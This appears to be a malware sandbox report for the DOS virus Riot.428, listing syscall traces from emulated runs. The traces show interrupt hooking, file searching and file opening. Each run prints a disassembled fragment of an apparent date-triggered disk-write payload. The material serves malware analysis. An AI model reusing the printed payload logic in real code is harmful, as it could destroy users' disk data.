Sample viewer

vx.netlux.org/Virus.DOS.Riot.428

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:15:56.720350309Z	51	PC: 12b5c \| Get or set Ctrl-Break
2018-12-17T23:15:56.725553398Z	51	PC: 12b64 \| Get or set Ctrl-Break
2018-12-17T23:15:56.726528862Z	53	PC: 12b69 \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:15:56.727565701Z	37	PC: 12b75 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:15:56.728793218Z	26	PC: 12b7d \| Set disk transfer address
2018-12-17T23:15:56.730136894Z	78	PC: 12ba8 \| Find first file
2018-12-17T23:15:56.733671297Z	67	PC: 12bd1 \| Get or set file attributes
2018-12-17T23:15:56.737865611Z	67	PC: 12c80 \| Get or set file attributes
2018-12-17T23:15:56.743564372Z	42	PC: 12c51 \| Get date 0x12c51: cmp dl, 1 0x12c54: je 0x12c59 0x12c56: jmp 0x12c77 0x12c58: nop 0x12c59: cli 0x12c5a: mov ah, 2 0x12c5c: cdq 0x12c5d: mov cx, 0x100 0x12c60: int 0x26 0x12c62: jmp 0x12c65 0x12c64: nop 0x12c65: mov al, 3 0x12c67: mov cx, 0x700 0x12c6a: mov dx, 0 0x12c6d: mov ds, word ptr [di + 0x99] 0x12c71: mov bx, word ptr [di + 0x55] 0x12c74: call 0x22c59 0x12c77: mov dx, word ptr [bp + 0x257] 0x12c7b: mov ax, 0x4301 0x12c7e: int 0x21
2018-12-17T23:15:56.745623423Z	67	PC: 12c80 \| Get or set file attributes
2018-12-17T23:15:56.750176621Z	79	PC: 12bb3 \| Find next file
2018-12-17T23:15:56.752219501Z	37	PC: 12bbc \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:15:56.753332332Z	51	PC: 12bc2 \| Get or set Ctrl-Break
2018-12-17T23:15:56.75422999Z	51	PC: 12b5c \| Get or set Ctrl-Break
2018-12-17T23:15:56.75543778Z	51	PC: 12b64 \| Get or set Ctrl-Break
2018-12-17T23:15:56.756207297Z	53	PC: 12b69 \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:15:56.75734737Z	37	PC: 12b75 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:15:56.758976962Z	26	PC: 12b7d \| Set disk transfer address
2018-12-17T23:15:56.760021536Z	78	PC: 12ba8 \| Find first file
2018-12-17T23:15:56.770570043Z	67	PC: 12bd1 \| Get or set file attributes
2018-12-17T23:15:56.782007471Z	67	PC: 12c80 \| Get or set file attributes
2018-12-17T23:15:56.801888679Z	61	PC: 12bde \| Open file (Filename = '�')
2018-12-17T23:15:56.812213015Z	76	PC: 0 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11808,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:31:23.267876734Z	51	PC: 12b5c \| Get or set Ctrl-Break
2018-12-25T12:31:23.275679587Z	51	PC: 12b64 \| Get or set Ctrl-Break
2018-12-25T12:31:23.2768274Z	53	PC: 12b69 \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:23.278357199Z	37	PC: 12b75 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:23.280511824Z	26	PC: 12b7d \| Set disk transfer address
2018-12-25T12:31:23.282462115Z	78	PC: 12ba8 \| Find first file
2018-12-25T12:31:23.287747636Z	67	PC: 12bd1 \| Get or set file attributes
2018-12-25T12:31:23.294520244Z	67	PC: 12c80 \| Get or set file attributes
2018-12-25T12:31:23.308288716Z	42	PC: 12c51 \| Get date 0x12c51: cmp dl, 1 0x12c54: je 0x12c59 0x12c56: jmp 0x12c77 0x12c58: nop 0x12c59: cli 0x12c5a: mov ah, 2 0x12c5c: cdq 0x12c5d: mov cx, 0x100 0x12c60: int 0x26 0x12c62: jmp 0x12c65 0x12c64: nop 0x12c65: mov al, 3 0x12c67: mov cx, 0x700 0x12c6a: mov dx, 0 0x12c6d: mov ds, word ptr [di + 0x99] 0x12c71: mov bx, word ptr [di + 0x55] 0x12c74: call 0x22c59 0x12c77: mov dx, word ptr [bp + 0x257] 0x12c7b: mov ax, 0x4301 0x12c7e: int 0x21
2018-12-25T12:31:26.597450473Z	51	PC: 12b5c \| Get or set Ctrl-Break (See above)
2018-12-25T12:31:26.598542189Z	51	PC: 12b64 \| Get or set Ctrl-Break (See above)
2018-12-25T12:31:26.599678106Z	53	PC: 12b69 \| Get interrupt vector (See above)
2018-12-25T12:31:26.601616757Z	37	PC: 12b75 \| Set interrupt vector (See above)
2018-12-25T12:31:26.603019622Z	26	PC: 12b7d \| Set disk transfer address (See above)
2018-12-25T12:31:26.604406124Z	78	PC: 12ba8 \| Find first file (See above)
2018-12-25T12:31:26.614074435Z	67	PC: 12bd1 \| Get or set file attributes (See above)
2018-12-25T12:31:32.156235633Z	76	PC: 0 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11808,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:31:23.260546977Z	51	PC: 12b5c \| Get or set Ctrl-Break
2018-12-25T12:31:23.261679059Z	51	PC: 12b64 \| Get or set Ctrl-Break
2018-12-25T12:31:23.262382395Z	53	PC: 12b69 \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:23.263391647Z	37	PC: 12b75 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:23.264719591Z	26	PC: 12b7d \| Set disk transfer address
2018-12-25T12:31:23.265729871Z	78	PC: 12ba8 \| Find first file
2018-12-25T12:31:23.270942327Z	67	PC: 12bd1 \| Get or set file attributes
2018-12-25T12:31:23.276937685Z	67	PC: 12c80 \| Get or set file attributes
2018-12-25T12:31:23.28253105Z	42	PC: 12c51 \| Get date 0x12c51: cmp dl, 1 0x12c54: je 0x12c59 0x12c56: jmp 0x12c77 0x12c58: nop 0x12c59: cli 0x12c5a: mov ah, 2 0x12c5c: cdq 0x12c5d: mov cx, 0x100 0x12c60: int 0x26 0x12c62: jmp 0x12c65 0x12c64: nop 0x12c65: mov al, 3 0x12c67: mov cx, 0x700 0x12c6a: mov dx, 0 0x12c6d: mov ds, word ptr [di + 0x99] 0x12c71: mov bx, word ptr [di + 0x55] 0x12c74: call 0x22c59 0x12c77: mov dx, word ptr [bp + 0x257] 0x12c7b: mov ax, 0x4301 0x12c7e: int 0x21
2018-12-25T12:31:23.284655769Z	67	PC: 12c80 \| Get or set file attributes (See above)
2018-12-25T12:31:23.290259491Z	79	PC: 12bb3 \| Find next file
2018-12-25T12:31:23.292228555Z	37	PC: 12bbc \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:23.293078455Z	51	PC: 12bc2 \| Get or set Ctrl-Break
2018-12-25T12:31:23.294076624Z	51	PC: 12b5c \| Get or set Ctrl-Break (See above)
2018-12-25T12:31:23.30168865Z	51	PC: 12b64 \| Get or set Ctrl-Break (See above)
2018-12-25T12:31:23.302277236Z	53	PC: 12b69 \| Get interrupt vector (See above)
2018-12-25T12:31:23.303443303Z	37	PC: 12b75 \| Set interrupt vector (See above)
2018-12-25T12:31:23.307479995Z	26	PC: 12b7d \| Set disk transfer address (See above)
2018-12-25T12:31:23.308434932Z	78	PC: 12ba8 \| Find first file (See above)
2018-12-25T12:31:23.319190235Z	67	PC: 12bd1 \| Get or set file attributes (See above)
2018-12-25T12:31:23.325154221Z	67	PC: 12c80 \| Get or set file attributes (See above)
2018-12-25T12:31:23.340590833Z	61	PC: 12bde \| Open file (Filename = '�')
2018-12-25T12:31:23.350874892Z	76	PC: 0 \| Terminate with return code (Return code = '0')